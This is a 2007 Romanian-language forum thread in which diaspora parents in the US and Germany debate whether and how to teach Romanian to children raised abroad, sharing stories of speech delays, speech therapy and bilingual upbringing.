La noi fetita care are 5 ani acum,a avut probleme cuexprimarea corecta in engleza sau romana,erao nebuloasa in capsorul ei si fiind si foarte timida se inchidea total in a se mai exprima in orice limba. A trebuit sa oinscriem in "speech terapy" si sa intrerupem pt ceva timp a mai vorbi cu ea in alta limba decit engleza. Stie sa numere, sa spuna culorile si in general intelege cind i se vorbesteromaneste dar va raspunde in engleza. Recunosc ca a uitat mult de cind am intrerupt in a mai vorbi romaneste cu ea, dar acum de cind si-a dat drumul fara problemela exprimare aminceput din nou sa o expunem la ambele limbi. De fapttraind in CA este expusa automat si la spaniola.

shogunelu
22.07.2007, 18:14
Limba MATERNA,in mod evident este limba mamei copilului,nicidecum limba locului unde traieste,indiferent ca s-a nascut sau nu acolo.

dixy2k
22.07.2007, 19:03
La partea cu limba materna este limba vorbita de mama am alta parerea. Noi vrem ca ai nostri pitici sa vorbeasca romaneste dar nu consider ca pt niste copii limba materna a mamei trebuie sa fie automat si a lor. Copii nascuti si crescuti in alta parte decit Romania sint expusi la o cu totul alta cultura si civilizatie. Nu ma intelegeti gresit: nu arunc cu pietre in cultura din Romania, nici nu ma gindesc la asa ceva, dar sincer, daca maninca sarmale facute in casa de Craciun nu inseamna ca sint crescuti numai in traditiile romanesti. Cresc in sistemul american, nu cel romanesc. Stiu pe cineva care a venit aici de mic copil, parintii amindoi romani, dar fata nu a vorbit romaneste mult timp, pina acum poate 5-6 ani cinda invatat sa scrie romaneste si sa vorbeasca pe internet. Acum s-a maritat anul trecut cu un mexican; vrei sa spui ca atunci cind va avea copii, copii vor fi romani si ar fi o rusine sa nu vorbeasca "limba materna"?

Copii mei vor vorbi romaneste si asta poate in primul rind pt necesitatea de a putea comunica cu bunicii; vrem sa ajungem cu ei si prin Romania dar poate cind vor fi un pic mai maricei sa inteleaga si sa-si aduca aminte de ceva; daca-i ducem acum in Romania sau la Sab Francisco pt ei va fi acelasi lucru. De un lucru insa sint constienta: probabilitatea in tara asta mare este foarte mica ca vreunul dintre copii mei sa se casatoreasca cu un roman/romanca. Care va fi atunci "limba materna" a copiilor lor? ROMANA? Doar pt ca bunica lor s-a nascut in Romania? Nu este cumva dusa la extrema acesta teama de a-ti pierde identitatea? Eu stiu ce sint si nu neg unde m-am nascut si de unde am plecat. Sint mindra de educatia primita de la parintii si bunicii mei din Romania, dar chiar daca copii mei vor vorbi romaneste, sufletul si amintirile despre Romania se vor stinge cu mine.

ce ne identifica pe noi ca romani? Eu cred ca modul in care am crescut, educatia si traditiile in care am crescut, amintirile copilariei pe care indiferent cit de departe am fi le purtam in suflet. Putem sa transferam astea copiilor nostri? In ce masura? Vrem oare ca ai nostri copii sa traiasca din amintirile noastre sau vrem sa le lasam portita deschisa pt a-si crea propriile lor amintiri chiar daca le vor visa intr-o alta limba decit romana?

FidelKatzo
22.07.2007, 23:01
ce ne identifica pe noi ca romani? Eu cred ca modul in care am crescut, educatia si traditiile in care am crescut, amintirile copilariei pe care indiferent cit de departe am fi le purtam in suflet. Putem sa transferam astea copiilor nostri? In ce masura? Vrem oare ca ai nostri copii sa traiasca din amintirile noastre sau vrem sa le lasam portita deschisa pt a-si crea propriile lor amintiri chiar daca le vor visa intr-o alta limba decit romana?

Nu sant sigur dar cred ca te referi la mentalitatea romaneasca..A mai spus cineva pe aici "sangele apa nu se face"..Ce putem oferi copiilor nostrii? Bani ? O situatie materiala ? Astea toate se pot pierde..O crestere si o educatie sanatoasa nu ti-o poate lua nimeni..

Cu EU-ul asta situatia economica in DE.s-a cam schimbat..Viitorul nu mai este chiar asa de roz pentru nemti ca acum10-15 ani..Am observat ca si la televiziune apar emisiuni care au ca tema insolvabilitatea firmelor sau a particularior..Emisiuni cu titluri fantoma ca de ex;"La drum cu executorul "..sau "Noua noastra patrie"..Emisiuni in care arata nemtzi ,care emigreaza sau traiesc de mai multi ani in strainatate..Acolo unde se afla neamtul vorbeste in familie numai nemteste..Si la a "N" generatie..

Un turc,ungur,sarb,rus,nu-si va pune niciodata intrebarea asta ..Ce limba sa vorbeasca in familie sau cu copiii lui..? Care este limba materna si la ce este buna..? Probabil ,dorinta noastra de a ne integra ,de a face lucrurile mai bine decat autohtonii ,ne face mai credinciosi decat Papa ..Sangele nostru devine incolor ,subtire ,usor diluabil..

Sa raspund si la intrebarea ta ..Ce ne identifica pe noi ca romani? As spune ;nepasarea cu care ne negam originea..

sauzimdebine
23.07.2007, 00:52
[QUOTE=dixy2k] Sa raspund si la intrebarea ta ..Ce ne identifica pe noi ca romani? As spune ;nepasarea cu care ne negam originea..

Mai catolici decat Papa. Doar noi, dragilor, doar noi atingem aceasta performanta.

mirabela
23.07.2007, 05:27
Comoditatea parintilor duce la necunosterea limbii romane de catre copiii lor, asta e parerea mea. Si lipsa de comunicare... daca iti faci timp sa vorbesti cu copilul tau in romaneste el va prinde limba din zbor cu o usurinta pe care nu o mai intalnesti la 20 sau 30 de ani... aici cred ca toata lumea e de acord. Dar e mai comod sa spui ca fiul tau traieste intr-o cultura diferita si ca romana nu-i va fi de prea mare folos vreodata.

Parerea mea e ca orice lucru stii in plus te inalta pe lumea asta... dar poate unii sunt adeptii teoriei " fericiti cei saraci cu duhul ".

hazel
23.07.2007, 05:54
Hai sa imi dau si eu cu parerea la acest topic. Cine zicea mai sus ca e usor sa judeci pana nu ii ai pe ai tai?...asa eram eu inainte, mi se parea imposibil si de neconceput ca si copilul intr-o familie de romani sa nu vorbeasca romaneste la perfectie. Copilul meu a vorbit mai greu decat alti copii. La doi ani nu spunea nimic, nu ca era muta, dar nu spunea ceva care sa aduca a cuvinte.Poate ca a avut incalzirea mai greu, ca acum ii turuie gurita de numa. Am fost cam speriati ca fata nu vorbeste, am dus-o la teste, pana la doi ani, desi intelegea absolut totul si facea orice ii spuneai, nu voia sa vorbeasca.Am plans singura de multe ori, ma gandeam ca ce ma fac daca copilul nu va vorbi sau e vreo problema cuea?Aici te cam si sperie pediatrii , ca virgula copiii trebuie sa inceapa sa vorbeasca la 1 an si daca nu o fac pana la 15-18 luni e ceva cu ei. Am facut test de auz, totul era normal. Ne-am dus la evaluare lalogoped sidupa ce a intereactionat vreo 2 ore cuea, a intrebat-o una si ailalta,cu mine traducatoare, ca fata era inca acasa nustia engleza, a tras concluziaca fata are mintea unui copil de 3 anijumate si vorbitul, output-ul este cel care lasa de dorit si trebuie lucrat la el. La scurt timp a inceput gradinita. Nu am apucat sa o ducem la sedinte de speech therapy.A inceput sa vorbeasca dupa ce am dat-o la gradinita, engleza , direct, bineinteles. Nu va spun ce fericiti am fost cand a vorbit! NU imi pasa ce limba vorbeste, eram fericiti ca vorbeste. Stia cateva vorbe in romaneste cand am dat-o, incet incet am observat cu disperare si neputinta cum le pierde, desi in casa vorbim 100% romaneste. Cat? Pai cele doua-trei ore seara pana merge la culcare, si in weekenduri. Imi e groaza si simt ca pierd teren serios cu romana. SUna a stereotip, dar asta e, intelege totul si nu raspunde decat in engleza. Peste un an o vom trimite in vacante la bunici si va invata ca lumea, sper,romaneste. Aici nu imi mai fac prea multe iluzii. Nu sunt suparata f tare, ma bucur ca fata e normala, sanatoasa, isteata, frumoasa si e totul pe lumea asta. Nu am sa ma supar daca pe la party-uri romanesti ma va judeca paulantoniu sau altcineva, si chiar nu am sa simt nevoia sa ma scuz ca de ce copilul nu stie prea bine romaneste. Si nu am sa o pedepsesc vreodata, prin a nu ii raspunde decat daca vorbeste romaneste, asa cum fac alti parinti ( si bravo lor), pentru ca nu vreau sa imi amintesc de vremurile cand ma rugam sa spuna ceva, orice, un cuvintelsi nu spunea nimic.

Cat despre familii unde numai un parinte este roman, v-as ruga sa judecati numai daca chiar sunteti in o asa relatie aici in USA si copilul vostru vorbeste. Este imposibil sa ii inveti pe copil romaneste, in afara de cateva cuvinteici colo si numai pentru ca le place copiilor cum suna,intr-o familie unde la scoala sau gradi vorbesc numai engleza si acasa, din cauza ca un parinte stie numai engleza, se vorbeste tot engleza. Am prietena cu copii casatorita cu american si , dupa ce am judecat-o ca de ce nu vorbeste cu ei romaneste, m-am convins cat e de greu, si cum te lupti cu morile de vant, atunci cand au venit la noi o saptamana in vizita.

FidelKatzo
23.07.2007, 06:40
Nu am sa ma supar daca pe la party-uri romanesti ma va judeca paulantoniu sau altcineva, si chiar nu am sa simt nevoia sa ma scuz ca de ce copilul nu stie prea bine romaneste. Si nu am sa o pedepsesc vreodata, prin a nu ii raspunde decat daca vorbeste romaneste, asa cum fac alti parinti ( si bravo lor), pentru ca nu vreau sa imi amintesc de vremurile cand ma rugam sa spuna ceva, orice, un cuvintelsi nu spunea nimic.

hazel,cred ca tu ne-ai prezentat un caz particular..Eu am prezentat punctul meu de vedere si sincer sa fiu ma bucur ca la mine furtuna a trecut..Cum va educati voi copiii este problema voastra..Ma bucur ca-i merge bine fetitei tale si ca parinte te inteleg foarte bine..Se pareca pentru ideile exprimate am ajuns pentru tine intruchiparea lui Baubau..

hazel
23.07.2007, 06:55
Nu esti baubau Paule, imi pare rau ca te-am pomenit. Probabil ca m-am incarcat citind mesajele anterioare. Cred ca prea usor judecam. Si eu la fel. Am condamnatsi eu la ski odata niste parinti care stateau in cafenea cu cei doi copii ai lor si copiii turuiau in engleza si parintii vorbeau romaneste. E clar ca nu ma incanta ideea ca fata sa nu vorbeasca romaneste, mai ales pt bunici. Ma oftic si eu ca pierd teren cu romana (daca am avut teren cu adevarat vreodata). Am sa fac tot ce pot ca sa o invat, insa nu am sa ma spanzur daca nu o va vorbi. Sper ca vacantele in Romania sa ajute.

Multumesc pentru cuvintele tale.

FidelKatzo
23.07.2007, 07:40
Ma oftic si eu ca pierd teren cu romana (daca am avut teren cu adevarat vreodata). Am sa fac tot ce pot ca sa o invat, insa nu am sa ma spanzur daca nu o va vorbi. Sper ca vacantele in Romania sa ajute.

Nu ai de ce sa te oftici,uni copii i-si dau drumul mai repede altii mai tarziu..Stiu un caz din Ro.unde copilul si-a dat drumul cu vorbitul la aproape patru ani.,s-a vorbit numai romaneste in casa..Problema nu trebuie privita cu disperare ..,la o varsta asa frageda ar fi cea mai mare greseala sa dai impresia copilului ca-l fortezi sa faca ceva..Totul trebuie facut relaxat in joaca si daca copilul nu reactioneaza "conform asteptarilor tale"nu inseamna neaparat ca nu a memorat ceva..Poti avea surpriza ca dupa un concediu de Ro.sa inceapa sa vorbeasca romaneste de te minunezi si tu..Iti dau perfecta dreptate ,ca parinte esti nevoit cate odata sa pui prioritati..

dixy2k
23.07.2007, 09:57
Hazel, si eu am avut aceiasi problema cu fetita mea ca si tine, insa noi am ajuns sa o inscriem in speech therapy. Ajunsese deja peste 2 ani si sunetele scoase de ea semanau a orice dar nu a propozitie sau cuvinte care sa faca sens. Asa ca si noi la acel moment am fost fericiti cind a inceput sa faca progrese si deja nu a mai contat in ce limba vorbeste. Daca ar trebui sa decid din nou in aceasta privinta as face acelasi lucru fara regret pt ca din tot sufletul consider ca am facut ce era bine pt copilul meu.

Paul, nu consider ca daca copii nu vor vorbi sau scrie perfect romaneste asta inseamna ca EU ca mama imi reneg radacinile si de unde am plecat. Noi vorbim romaneste cind sintem inconjurati de romani dar intr-adevar in ce priveste munca vorbim numai engleza ca de altfel multi dintre romanii din U.S.

Ma bucur pt tine ca ai reusit sa ajungi la stadiu in care copii tai sa faca trecerea fara probleme intre 3 limbi dar din pacate la noi nu a fost cazul. Asa cum am vazut la niste cunoscuti, nepotica lor de 2 ani trecea fara nici cea mai mica problema de la spaniola la engleza si invers, pe cind a mea la 4 1/2 ani are probleme. Poate tine si de copil, iar unii exceleaza mai bine decit altii in acest domeniu.

hazel
23.07.2007, 10:57
dixy2k, te inteleg foarte bine, bine ai facut ca mama! Sunt alaturi de tine. Si acum ma gandesc cum plangeam dimineata in masina in drum spre munca de teama ca avem ceva probleme...In timp ce alti copii ai prietenilor nostri, de varsta ei, turuiau inainte de 2 ani fara probleme, ea nu zicea nici "mama".

Noi suntem ok acum, vorbeste de nu o putem opri si suntem la perioada "Why" in sus si "Why" in jos :))) o sa incercam sa invatam si "De ce" :))

Si eu am ramas muta cand i-am auzit pe copiii vecinilor mei, danezi, unul nascut aici si celalalt venit la 2 ani, vorbind daneza in timp ce se jucau impreuna. Asa ceva chiar nu am mai vazut, de obicei toti copii vorbesc engleza intre ei cand se joaca. Bravo lor si bravo parintilor. Si puiutii nostri sa fie sanatosi smileys/smiley1.gif

dixy2k
23.07.2007, 15:09
Cunosc atit de bine sentimentul Hazel! Cind am fost cu ea la testare pt speech therapy mi-au spus ca nu e nimic de ingrijorat dar daca vreau o pot inscrie la program. Am fost fericita atunci si sincer, a facut progrese mari de tot in ultimul an. Acum vorbeste bine si cum ai spus si tu de fetita ta vorbeste continuu smileys/smiley1.gif. Apropo, a ta este emotiva? A mea ma inebuneste plingind din orice. Cred ca si fara motiv de multe ori. Am gasit-o intr-o seara plingind ca era tubul de pasta de dinti pe terminate si nu putea sa stoarca pasta din tub sa se spele pe dinti inainte de culcare smileys/smiley4.gif.

23.07.2007, 20:39
dixyk2 si hazel unii copii exceleaza in acest domeniu mai bine decat altii dupa cum binea spus dixy2k la fel cu mersul,la fel cu plansul si galagia cand sunt bebelusi.Nu e vina voastra .Am o ruda prin aliantacare e australianca nascutade origine greaca si stie greaca perfect maritata cu unnewyorkez cu care are o fetita de 3 ani care vorbeste orice cu oricine dar din cand in cand o da pe greceste cu maicasa de te sperii. Nedumerirea mea ar fi cum sa te simti jenat sa vb limba ta cu copilul tau doar pt ca sotul/sotia sunt americani si probabil se simt ofensati ca ei nu inteleg. Americani sunt oricum cam ofticati de felcand nu se vb engleza sau spaniolasi vor sa stie ei tot:). Ofensati sa ramana daca sunt atat de ingusti sa nu priceapa ca e spre binele copilului sa stie cat mai multe ,nu se stie spre ce-l poarta viata pe acel copil si poate-i va fi de mare ajutor .(stiti prea bine canoi pricepem italianasi spaniola usor dar limba noastra e de neinteles)Spun asta pt ca am citit pe aici niste persoane care erau ingrijorate de cum se simte partenerul american si de cat de greu este sa vorbesti in romana in casa. ha ha

La noi este greu se pare dar orice copil nascut aici din parinti hispanici vorbesc spaniola la fel ca engleza , ei cum or putea? don't even say schoolsmileys/smiley36.gif

sauzimdebine
23.07.2007, 21:13
Ceea ce nu inteleg, sau nu vor sa inteleaga, parintii de doresc sa-si vada pruncii de 3, 4 anisori cel putin cu un master in engleza, este ca nu limba in care li se vorbeste este problema. Problema sta in cu totul alta directie si copilul se va dezvolta in functie de atentia si ajutorul de i se va da, indiferent de limba folosita pentru comunicare. Varsta prunciei este varsta propice invatarii limbilor straine. Cu cat copilul este expus la mai multe limbi cu atat mai bine. Limba engleza va fi invatata, prinsa din mers, fara probleme, de la gradinita, scoala, joaca, TV, si asa mai departe. Limba materna in schimb, scuze celor de vor sa creada ca au dreptate sustinand contrariul dar limba materna este limba mamei, limba materna nu se poate invata decat in casa, cu mama. Exista si variante gen "greek school", din pacate nu si pentru limba romana. Copilul va creste, va avea tot ce poate avea, dar nu va avea acel ceva in plus pe care ar fi putut sa-l aibe daca mama nu renunta cu prea mare usurinta la 'bagajul" de spiritualitate de-l are. Bagaj ce, in ciuda renuntarii, il va purta cu ea pana dincolo de moarte pentru ca nu-l va lasa mostenire.

AndaF
23.07.2007, 22:57
Ceea ce nu inteleg, sau nu vor sa inteleaga, parintii de doresc sa-si vada pruncii de 3, 4 anisori cel putin cu un master in engleza, este ca nu limba in care li se vorbeste este problema. Problema sta in cu totul alta directie si copilul se va dezvolta in functie de atentia si ajutorul de i se va da, indiferent de limba folosita pentru comunicare. Varsta prunciei este varsta propice invatarii limbilor straine. Cu cat copilul este expus la mai multe limbi cu atat mai bine. Limba engleza va fi invatata, prinsa din mers, fara probleme, de la gradinita, scoala, joaca, TV, si asa mai departe.

Vorbesti din experienta?

In momentul in care se vorbesc mai multe limbi in casa, copilul ( chiar si adultul) incepe sa le amestece - solutia cea mai buna este ca un parinte sa vorbeasca o limba si celalat alta limba ( asa cum spunea Paul) -eu am facut pe translatoarea intre mama mea si sot - si la un moment dat era un fel de ronglish smileys/smiley36.gif

P.S. Asa e, copilul invata engleza din mers... intrebarea este - cat de bine o invata? Scoala la care este baiatul meu cel mare este o scoala foarte buna si au un nivel ridicat - la sfarsitul clasei 1, copii trebuie sa stie sa citeasca la nivelul 16, destul de greu pentru copii de 7 ani... asta apropo si de scoli - se spuneca scolile nu sunt bune aici... so far, it's very good smileys/smiley2.gif dar, deh, de-abia trecem in clasa a 2 a...

24.07.2007, 00:55
ce ne identifica pe noi ca romani? Eu cred ca modul in care am crescut, educatia si traditiile in care am crescut, amintirile copilariei pe care indiferent cit de departe am fi le purtam in suflet. Putem sa transferam astea copiilor nostri? In ce masura? Vrem oare ca ai nostri copii sa traiasca din amintirile noastre sau vrem sa le lasam portita deschisa pt a-si crea propriile lor amintiri chiar daca le vor visa intr-o alta limba decit romana?.

cel mai realist si pertinent comentariu pe care l-am vazut pana acum.

FidelKatzo
24.07.2007, 01:33
Ceea ce nu inteleg, sau nu vor sa inteleaga, parintii de doresc sa-si vada pruncii de 3, 4 anisori cel putin cu un master in engleza,

Limba engleza va fi invatata, prinsa din mers, fara probleme, de la gradinita, scoala, joaca, TV, si asa mai departe. Limba materna in schimb, scuze celor de vor sa creada ca au dreptate sustinand contrariul dar limba materna este limba mamei, limba materna nu se poate invata decat in casa, cu mama.

Copilul va creste, va avea tot ce poate avea, dar nu va avea acel ceva in plus pe care ar fi putut sa-l aibe daca mama nu renunta cu prea mare usurinta la 'bagajul" de spiritualitate de-l are.

Sa nu uitam decazurile particulare ..,la fiecare copil este altfel..Greseala cea mai mare este daca incepem sa facem comparatii..Sa pretindem de la copilul nostru sa faca neaparat ce fac si ceilalti copii..Pentru fiecare parinte copilul lui estecel mai important si cu aptitudini aparte..Totul e sa descoperi aceste aptitudini si sa le promovezi..

I-mi vine foarte usor sa fac pe desteptul dupa ce furtuna a trecut, dar recunosc ca nu a fost usor..I-mi pare bine ca am perseverat ,dar am avut si eu indoielile mele daca esta corect sau nu sa-i incarc pe copii suplimentar cu limba romaneasca..Din cauza serviciului ne-am mutat des,asta inseamna ca si pentru copii a fost un stres in plus,pentru-ca trebuia sa treaca un timp pina profesorii se lamureau ca nu sant mai prosti decat ceilalti copii ..La fiecare scoala am fost sfatuit calduros sa vorbim in familie germana, deoarece altfel copilul va avea greutati la limba germana..Am avut mult de luptat cu prejudecatile unor profesori incuiati ,tin minte ca la vremea aceea ma trezeam cateodata noaptea si ma gandeam ;oare de ce copilul meu este sicanat ,defavorizat ,sau tratat ca omarfa de categoria a treia..?

Intre copiii mei este o diferenta de varsta, de noua ani..Deci cu cel mai mare am invatat pina in clasa a 9 de liceu , cu celalat pana intr-a 8 de liceu ..Trimestrial trebuia sa ma prezint la scoala la sedintele cu parintii..Dupa serviciu si la sfarsit de saptamana trebuia sa fac lectiile cu ei..Nici nu-mi vine sa cred ca am avut asa nervi buni..Prima data le explicam romaneste ca mergea mai usor..,dupa aceea luam cartea citeam in germana..,si le maiexplicam inca odata ingermana..Mi-am facut cruce cand am vazut ca incep sa invete singuri si nu mai au nevoie de ajutorul meu..

sauzimdebine,cred ca fiecare parinte i-si doreste ca copilul lui sa stie limba materna ..Este ceva realizabil ..Corect este sa-i prevenim ca vor fi si greutati de intampinat..Ramine la latitudinea fiecaruiacat timp si energieeste dispus sa sacrifice pentru copilullui..Sa nu uitam ca santem straini intro tara straina..

sauzimdebine
24.07.2007, 03:58
AndaF, daca nu ar fi si experienta in ceea ce spun, as fi un specialist in domeniu, ceea ce nu sunt. Vorbesc doar din experienta.
Cat de bine va invata un copil engleza? Mai mult sau mai putin, in functie de aptitudini, va invata engleza la fel de bine cum va invata si la celelalte discipline. Dupa cum spune si Paul, sunt copii si copii. Unii se nasc talentati iar altii nu. Unele scoli sunt bune, altele mai putin bune. Sunt copii care merg la scolile foarte bune si ... o dau in bara. Sunt copii care merg la scolile mai putin bune si ... reusesc sa-si depaseasca conditia si sa realizeze ceva in viata. Totul este necesar a fi judecat de la caz la caz. Eu nu sustin necesitatea unui sablon. Ceea ce spun eu este ca va fi in avantajul copilului, ajuns la varsta maturitatii, sa mosteneasca de la ai sai parinti ceea ce se putea mosteni. Si nu vorbesc aici doar despre sarmalele de Craciun.

hazel
24.07.2007, 09:01
Apropo, a ta este emotiva? A mea ma inebuneste plingind din orice. Cred ca si fara motiv de multe ori. Am gasit-o intr-o seara plingind ca era tubul de pasta de dinti pe terminate si nu putea sa stoarca pasta din tub sa se spele pe dinti inainte de culcare smileys/smiley4.gif.

Draga dixy, stii si tu ca la varstele trecem prin multe drame smileys/smiley1.gifnu stiu daca fata ta e prea sensibila si nu cumva pt cei mai multi copii s-ar declansa o drama daca ar fi opriti sa faca ceva ce tine parte de rutina, cum ar fi spalatul pe dinti. A mea nu plange des, dar putem trece printr-o adevarata drama daca, de exemplu,iesim din casa cu Teddy, ursuletul ei si "security blanket" -ul ei, daca e frig afara si el nu are hainuta pe el. E chestiune serioasa, si uite ca trebuie sa ma ingrijesc si de copilul ei sa nu cumva sa ii fie frig smileys/smiley36.gif

sauzimdebine -ai vrut sa fii ironic pomenind de acei parinti care vor sa isi vada copiii masters of english la 3-4 ani? smileys/smiley1.gifMa depaseste ironia, sper ca ai inteles problemele (nu ca ai fi obligat) prin care dixy sau eu am trecut. Cum am zis si am sa imi mentin credinta mea, indiferent de comentariile unor conationali, in conditiile in care copilul meu a vorbit greu, sunt deocamdata recunoscatoare lui Dumnezeu ca ii turuie gurita indiferent in ce limba. Pretentiile ni le mai ajustam in functie de situatii, credeam ca fata mea o sa fie perfecta si o sa vorbeasca romana la un an. N-a fost sa fie asa. Nu am sa ma omor si nu am sa o chinui si cu asta punct in ceea ce ma priveste smileys/smiley1.gifSpun asta acum, probabil ca, cu ajutorulnostru sivacante in Romania,va ajunge sa stie romana ca si alti copii de romani aici.

sauzimdebine
24.07.2007, 09:17
Nu hazel. Departe de mine gandul de a fi ironic in astfel de cazuri. Sunt constient ca situatia prin care tu si familia ta ati trecut nu a fost deloc usoara si de aceea nu o doresc nimanui. Remarca mea se adresa exact celor care doresc acel lucru, nu celor care, ca si tine, au de intimpinat cu totul alte probleme. Sunt convins ca daca va exista vointa din partea ta, copilul tau va ajunge sa vorbeasca si romaneste. Si da, o vacanta de o vara in Romania face minuni. Spun asta din experienta. Pustoaica mea, datorita sportului si unor probleme de recuperare in urma unei accidentari serioase, a petrecut mai mult de o vacanta in Romania. Inca vorbeste cu placere de acele clipe.

AndaF
24.07.2007, 13:57
Si Chip a avut probleme de vorbire, si a fost prin scoala la speech therapy, iar dupa 1 an si ceva deja nu mai are probleme aproape deloc smileys/smiley4.gif chiar a devenit prea vorbaret smileys/smiley36.gif

In ultimile 6 luni am fost voluntar la scoala lui, am mers si cu cel mic, si nu numai ca a fost bine pentru ei, dar am invatat si eu engleza mult mai bine...

Sauzimdebine - probabil am interpretat eu gresit mesajul tau smileys/smiley1.gif acum am inteles ce-ai vrut sa spui...

CameliaXX
24.07.2007, 16:37
Am un exemplu real: dupa cum stiti am 2 copii- o fetita de 9 si un baiat de 7. Amindoi stiu unde e Romania pe harta, Marea Neagra si faptul ca ..." trebuie zburat cu avionul foarte multe ore- vreo 14-"cuvintele lor.

In schimb eu vorbesc romaneste (si maica-mea) cu ei, dar mereu ei imi raspund in engleza. Am incercat si oricit de mult timp am pierdut cu ei, ei au avut mereu sistemul acesta 8:00am to 2:30 pm engleza intensiva. De la fetita mea de 4 ani care nu stia o boaba in engleza, fetita mea acum nu prea vorbeste romaneste (si nu intelege si se plictiseste repede). DImpotriva a invatat-o pe maica-mea bine (pot sa spun) engleza (o femeie la 58ani) vorbeste gramatical binisor - ca are mereu cartile lor si face temele cu ei...

Concluzia? E vina mea.?..Poate ar fi trebuit sa mai petrec inca vreo 5 ore pe zi intensiv romana cu ei...CIne are timp ? Imi place si mie sa ma uit la un film, etc...(nu sa vorbesc intr-una).

Nu ma deranjeaza sa nu stie copiii romana. M-ar deranja ca fata mea sa stea 10 ore pe internet (sta doar 1 ora pe saptamina)...Si daca ar lua note proaste...(ceea ce nu e cazul- e prima din clasa ei). Si baiatul meu invata bine (bravo bunicii!)...

Si nu va spun ca fata mea plinge chiar din orice. Se ataseaza de orice, in in ultimul timp, am avut dog shepperd german (puppy) care a stat cu noi 2 saptamini (si l-am dat ca nu imi plac ciinii in casa- chiar daca era superb). Am avut si iepuras (o luna)- a plins dupa acela cit a putut (si s-a linistit cind i-am zis ca are o gramada de prieteni in padure care il asteapta- acolo l-am gasit).

In sfirsit avem doua pasarele mici- una alba si una blue. Ce le mai iubeste...SI ar cumpara jumatate de Pet Store....smileys/smiley2.gif

dixy2k
24.07.2007, 16:57
smileys/smiley20.gif, sincer, nici macar nu mai caut justificari si explicatii de ce copilul meu nu vorbeste romaneste ci doar intelege. Cine vrea sa judece poate sa o faca in orice fel; data fiind situatia la momentul respectiv, consider ca am facut cea mai buna alegere pt a o ajuta in dezvoltare asa sint impacata cu mine. Felicitari celor ai caror copii vorbesc romaneste perfect, si de asemenea felicitari tuturor parintilor! smileys/smiley20.gif. Sa fie copii nostri sanatosi ca asta este mai important decit ce limba vorbesc sau care este considerata sau nu limba lor materna.

Camelia, m-ai facut sa rid la faptul ca fetita ta si-a invatat bunica engleza mai repede decit ea sa invete romaneste! Dar se poate privi si din alt punct de vedere: este mai benefic pt ea ca bunica o poate ajuta la lectii decit daca ea ar fi vorbit romaneste iar bunica neintelegind engleza.

sorin
24.07.2007, 17:30
In ceea ce priveste casatoriile mixte, nu am cum sa ma pronunt, pentru ca nu e cazul meu si nu as putea sa-mi dau cu parerea. In ceea ce priveste casatoriile 100% romanesti, consider ca scuzele si argumentele in ceea ce priveste neinvatarea limbii romane de catre copii, nu sunt justificate, oricare ar fi ele, in cazurile in care nu s-au facut nici un fel de eforturi in acesta directie. Limba materna poate si trebuie transmisa copiilor nostri, pentru ca astfel de perpetuam traditiile sicultura, astfel demonstram ca nu ne e rusine ca suntem romani si de ce nu, oferim copiilor nostri o sansa in plus fiind bilingvi, pentru ca niciodata nu se stie cand le va fi de folos. Treaba cu neinvatatul limbii engleze din cauza ca ar vorbi romaneste nu tine, pentru ca e imposibil sa n-o invete traind intr-o <st1:place w:st="&#111;n">tara</st1:place> unde se vorbeste engleza. Cum va explicati ca noi in scoala invatam de mici alte limbi straine, dar nu ne putem invata copiii limba materna? A uitat vreunul dintre voi limba romana din acest motiv? Cum va explicati ca alte nationalitati din <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Romania</st1:place></st1:country-regi&#111;n> (unguri, turci, germani, etc.) vorbesc limba lor materna si in acelasi timp limba romana fara probleme? Consider dureros sa vad unii parinti vorbindu-le copiilor in engleza, pe care nici macar n-o stapanesc bine, fara sa faca macar eforturi sa-i invete limba romana. Exista carti, casete video, audio, CD-uri, DVD-uri, vointa, copiii pot fi recompensati pentru progresele lor, pot fi trimisi la bunici in vacanta de vara, etc. Cu toate acestea, unora le este mult mai simplu sa se lase loviti de

darie
24.07.2007, 17:36
....Am incercat si oricit de mult timp am pierdut cu ei, ei au avut mereu sistemul acesta 8:00am to 2:30 pm engleza intensiva. ....

Concluzia? E vina mea.?..Poate ar fi trebuit sa mai petrec inca vreo 5 ore pe zi intensiv romana cu ei...CIne are timp ? Imi place si mie sa ma uit la un film, etc...(nu sa vorbesc intr-una).

...Se ataseaza de orice, in in ultimul timp, am avut dog shepperd german (puppy) care a stat cu noi 2 saptamini (si l-am dat ca nu imi plac ciinii in casa- chiar daca era superb).

CameliaXX ,

destul de rau ca timpul petrecut cu copii il consideri timp pierdut asa cum spui mai sus.

Trebuia sa lasi semintele,sa-ti ridici dindosul de pe couch,si sa-i scoti la plimbare pe toti 3 (german shepard + 2 copii) si numai pe shepard daca il ivatai romaneste ailalti doi vorbeau cu el la fel :(.

Din proprie experienta ,..................."a" mica a mea mai nou vorbeste cu cainele in romaneste si cu mandrie traduce prietenelor ei ce inseamna si ce bine intelege cainele ei limba romana :)

Acum c-ai scapat de shepard cum o sa inveti "pasaricile" romaneste,huh? :)

24.07.2007, 21:27
In ceea ce priveste casatoriile mixte, nu am cum sa ma pronunt, pentru ca nu e cazul meu si nu as putea sa-mi dau cu parerea. In ceea ce priveste casatoriile 100% romanesti, consider ca scuzele si argumentele in ceea ce priveste neinvatarea limbii romane de catre copii, nu sunt justificate, oricare ar fi ele, in cazurile in care nu s-au facut nici un fel de eforturi in acesta directie. Limba materna poate si trebuie transmisa copiilor nostri, pentru ca astfel de perpetuam traditiile sicultura, astfel demonstram ca nu ne e rusine ca suntem romani si de ce nu, oferim copiilor nostri o sansa in plus fiind bilingvi, pentru ca niciodata nu se stie cand le va fi de folos. ....

Ca sa-l parafrazez pe sorin: in ceea ce priveste casatoriile 100% romanesti n-ar trebuisa ma pronunt, pentru ca nu e cazul meu.

Dar imi dau totusi cu parerea: perpetuarea traditiilor si culturii romanesti,cred ca e cam utopic pt. cei care traiesc de mici in strainatate. cat de mult ai preluat tu din traditiile bunicilor ? (intrebare retorica, tu poate ai preluat, eu cel putin nu mai stiu aproape nimic, desi am crescut cu ei in Romania) . Nici in Romania aproape ca nu se mai simte nici-o traditie sau cultura tipic romaneasca; in afara de niste colinde de prost gust pe care le auzi iarna in toate pietele, eu nu mai observ nimic. (iarasi, parerea mea, sau poate sint eu prea superficial)

Ar mai ramane literatura, scriitorii clasici romani, ceea ce ne duce la celalalt aspect: limba. Aici sint de acord - ar fi foarte frumos ca copii romani sa invete si sa poata sa practice limba romana. (iarasi, in cazul meu asta nu se intampla, si-mi pare rau).

dixy2k
25.07.2007, 05:48
